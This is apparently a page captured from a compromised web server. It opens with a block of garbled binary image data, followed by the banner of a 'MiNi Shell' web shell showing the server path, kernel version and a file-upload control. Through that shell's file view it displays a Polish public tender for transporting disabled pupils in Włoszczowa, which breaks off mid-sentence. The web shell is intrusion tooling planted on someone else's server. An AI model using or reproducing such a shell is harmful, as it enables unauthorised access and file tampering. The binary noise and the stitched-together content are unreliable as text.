JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240702/0039303901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa dowozu i odwozu w roku szkolnym 2024/2025 uczniów niepełnosprawnych z terenu Gminy Włoszczowa, wraz z zapewnieniem opieki do i z OREW w Psarach-Kolonii 57 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMORZĄDOWE CENTRUM OŚWIATY WE WŁOSZCZOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366044643</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Partyzantów 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włoszczowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">29-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sco.zamowienia@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://scowloszczowa.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa dowozu i odwozu w roku szkolnym 2024/2025 uczniów niepełnosprawnych z terenu Gminy Włoszczowa, wraz z zapewnieniem opieki do i z OREW w Psarach-Kolonii 57 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1df5770-383b-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00393039</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00031283/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa dowozu i odwozu w roku szkolnym 2024/2025 uczniów niepełnosprawnych z terenu Gminy Włoszczowa wraz z zapewnieniem opieki do i z OREW w Psarach-Kolonii 57</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wloszczowa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wloszczowa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz<br/>informacji za pośrednictwem Platformy znajdującej się pod adresem: https://platformazakupowa.pl/pn/wloszczowa w zakładce<br/>&#34;Wiadomości&#34;.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę.<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>Wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio w<br/>serwisie internetowym: na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub<br/>powiadomienie może trafić do folderu SPAM.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w<br/>zakładce „Regulamin” (https://platformazakupowa.pl/strona/regulamin) oraz uznaje go za wiążący,<br/>b) zapoznał oraz stosuje się do instrukcji składania ofert dostępnej pod linkiem: https://platformazakupowa.pl/strona/instrukcjewykonawca.<br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z Platformy, w<br/>szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/>w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy<br/>Pzp.<br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z Platformy, w<br/>szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/>w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy<br/>Pzp.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>7. Instrukcje korzystania z Platformy - „Instrukcje dla Wykonawców” znajdują się pod adresem:<br/>https://platformazakupowa.pl/strona/instrukcje-wykonawca.<br/>8. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Centrum Wsparcia Klienta dostępne<br/>codziennie od poniedziałku do piątku w godz. od 8.00 do 17.00 pod nr tel. 22 101 02 02.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE.<br/>L. z 2016 r. Nr 119, str. 1 z późn. zm), dalej „RODO”, informuję, że:<br/>− W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy<br/>pn.: „Usługa dowozu i odwozu w roku szkolnym 2024/2025 uczniów niepełnosprawnych z terenu Gminy Włoszczowa, wraz z<br/>zapewnieniem opieki do<br/>i z Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Psarach-Kolonii 57” Pani/Pana danych osobowych, przysługuje<br/>Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego<br/>w sprawach ochrony danych osobowych.<br/>− Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi<br/>przepis prawa Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.<br/>2. Administratorem Pani/Pana danych osobowych jest Dyrektor Samorządowego Centrum Oświaty we Włoszczowie (29-100<br/>Włoszczowa, ul. Partyzantów 14).<br/>3. Administrator wyznaczył Inspektora Ochrony Danych –e-mail: inspektor@cbi24.pl. 4. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu<br/>nieograniczonego.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej „ustawa Pzp”.<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 5 lat od dnia zawarcia<br/>umowy, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą ww. przedział czasowy, okres przechowywania obejmuje ten<br/>termin.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SCO.2611.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przewozowa dowożenia i odwożenia, wraz z zapewnieniem opieki na czas dowozu i<br/>odwozu, od 1 września 2024 r. do 30 czerwca 2025 r., w dni nauki szkolnej 9 dzieci niepełnosprawnych zamieszkałych w<br/>Gminie Włoszczowa do i z Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Psarach-Kolonii 57, 29-145 Secemin,<br/>w tym:<br/>- 5 dzieci niepełnosprawnych ruchowo korzystających z wózków inwalidzkich i innych z następujących miejscowości:<br/>Gościencin (2), Kurzelów (1), Włoszczowa (2) oraz<br/>- 4 dzieci niepełnosprawnych z następujących miejscowości: Międzylesie (1), Bebelno Kolonia (1), Bebelno Wieś (1),<br/>Boczkowice (1).<br/>Dzienny przebieg – ok. 140 km<br/>Usługa przewozowa świadczona będzie od 1 września 2024 r. do 30 czerwca 2025 r., w dni nauki szkolnej (również w dni<br/>odpracowywania przez uczniów zajęć lekcyjnych), z wyjątkiem dni wolnych od zajęć szkolnych, zgodnie z organizacją roku<br/>szkolnego – z możliwością przedłużenia umowy do dnia 31 lipca 2025 r., pod warunkiem wyrażenia przez co najmniej 2<br/>rodziców/opiekunów woli uczęszczania dzieci do OREW w Psarach również w miesiącu lipcu 2025 r.<br/>Wykonawca winien dysponować minimum 2 samochodami specjalistycznymi przystosowanymi do przewozu osób<br/>niepełnosprawnych, które winny posiadać sprzęt ułatwiający wsiadanie i wysiadanie dziecku poruszającemu się na wózku w<br/>postaci: wind lub najazdów teleskopowych dla wózków inwalidzkich z powłoką antypoślizgową umożliwiającą wprowadzanie<br/>wózków do pojazdu oraz odpowiednie zabezpieczenie dla przewozu dzieci i wózków, pasy bezpieczeństwa biodrowo –<br/>barkowe do przypinania dzieci znajdujących się na wózkach oraz odpowiednie zabezpieczenie dla przewozu dzieci i<br/>wózków. Pojazdy oferowane do przewozu uczniów muszą być odpowiednio oznakowane i nie starsze niż 6 lat<br/>(wyprodukowane nie wcześniej niż w 2018 r.). Pojazdy oferowane do przewozu uczniów muszą posiadać aktualne badanie<br/>techniczne oraz opłacone polisy ubezpieczeniowe pojazdu OC i NNW.<br/>Wykonawca zobowiązany będzie do świadczenia usług przewozowych odpowiednio oznakowanymi pojazdami (w tablice:<br/>„Przewóz osób niepełnosprawnych” umieszczoną wewnątrz pojazdu przy przedniej i tylnej szybie oraz żółte tablice z<br/>symbolem dzieci umieszczone z przodu i tyłu samochodu po lewej stronie), posiadającymi homologację, przystosowanymi<br/>do przewozu osób i uczniów niepełnosprawnych, wyposażonymi w pasy bezpieczeństwa, stacjonarne mocowanie wózków<br/>inwalidzkich oraz ogrzewanie niezależne.<br/>Przypuszczalna liczba objętych usługą uczniów: 9. Zamawiający zastrzega sobie możliwość zmiany liczby dowożonych<br/>uczniów plus, minus 20%.<br/>Opieka nad przewożonymi dziećmi winna być sprawowana przez osobę pełnoletnią posiadającą przeszkolenie w zakresie<br/>udzielania pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych.<br/>Obowiązków opiekuna nie może pełnić osoba kierująca pojazdem.<br/>Opieka musi być sprawowana podczas każdego kursu.<br/>Dokładny rozkład dowozu i odwozu ustalony zostanie między Wykonawcą, a rodzicami lub opiekunami dzieci, w sposób<br/>zapewniający uczniom obecność w ośrodku w czasie trwania zajęć oraz przekazany do wiadomości Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami i wagami:<br/>1) cena: 60 pkt,<br/>2) Średni wiek taboru wykonującego zamówienie: 30 pkt,<br/>3) Czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii (liczony od chwili powzięcia informacji o wystąpieniu<br/>awarii): 10 pkt.<br/>2. Ocena ofert zostanie przeprowadzona w stosunku do ofert nie podlegających odrzuceniu i których Wykonawcy nie podlegają<br/>wykluczeniu z postępowania w oparciu o przedstawione wyżej kryteria oraz ich wagi. Oferty oceniane będą punktowo.<br/>3. Maksymalną ilość punktów, jaką po uwzględnieniu wag, może osiągnąć oferta, wynosi 100 pkt:<br/>1) Kryterium nr 1 - cena (C) - waga 60 % (60 pkt)<br/>Zamawiający przyzna 60 punktów ofercie o najniższej cenie, każdej następnej zostanie przyporządkowana liczba punktów<br/>proporcjonalnie mniejsza, według wzoru:<br/>C = (C min / C o ) x 60 pkt<br/>gdzie:<br/>C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o – cena brutto oferty badanej (zł)<br/>2) Kryterium nr 2 – Średni wiek taboru wykonującego zamówienie - waga 30 % (30 pkt). Wiek pojazdów wyliczony w sposób<br/>następujący: średni wiek taboru wykonującego zamówienie: do 6 lat - 30 pkt, powyżej 6 lat - 0 pkt<br/>3) Kryterium nr 3 – Czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii (liczony od chwili powzięcia informacji o<br/>wystąpieniu awarii) - waga 10% (10 pkt).<br/>- do 15 min. – 10 pkt,<br/>- od 16 min. do 30 min. – 5 pkt,<br/>- powyżej 30 min. – 0 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, będącą sumą punktów przyznanych w<br/>powyższych kryteriach.<br/>W toku badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień dotyczących treści złożonej oferty.<br/>Zamawiający poprawia w ofercie następujące kategorie omyłek:<br/>- oczywiste omyłki pisarskie;<br/>- oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek;<br/>- inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty,<br/>niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>4. W przypadku, o którym mowa w art. 223 ust. 2 pkt 3 Pzp, Zamawiający wyznacza Wykonawcy odpowiedni termin na wyrażenie<br/>zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej poprawienia. Brak odpowiedzi w wyznaczonym terminie uznaje się<br/>za wyrażenie zgody na poprawienie omyłki.<br/>5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w rozdziale III pkt 3 SWZ.<br/>6. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta<br/>otrzymała najwyższą cenę, do wyrażenia w wyznaczonym przez Zamawiającego terminie pisemnej zgody na wybór jego oferty.<br/>7. W przypadku braku zgody, o której mowa w pkt 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenia takiej zgody<br/>do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia<br/>postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni wiek taboru wykonującego zamówienie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii (liczony od chwili powzięcia informacji o wystąpieniu awarii)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1 .Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga, aby Wykonawca posiadał ważną licencję (zezwolenie) do wykonywania na terenie Polski transportu<br/>drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r.<br/>o transporcie drogowym (t.j. Dz. U. z 2024 r. poz. 728 z późn. zm. ), oraz z ustawą z dnia 20 czerwca 1997 r. – Prawo o<br/>ruchu drogowym (t.j. Dz. U. z 2023 r. poz. 1047 z późn. zm.).<br/>3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4. Zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie wykształcenia, kwalifikacji zawodowych, doświadczenia,<br/>potencjału technicznego Wykonawcy lub osób skierowanych przez Wykonawcę do realizacji zamówienia, umożliwiające<br/>realizację zamówienia na odpowiednim poziomie jakości jeżeli:<br/>1) Warunek w zakresie doświadczenia:<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonuje lub wykonał w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi<br/>polegające na przewozie w co najmniej jednym roku szkolnym minimum 20 uczniów niepełnosprawnych (w sumie) do szkół,<br/>trwające nieprzerwanie minimum 10 miesięcy, o wartości minimum 250 000 zł (w sumie), ze wskazaniem przedmiotu, dat<br/>wykonania i odbiorców, oraz 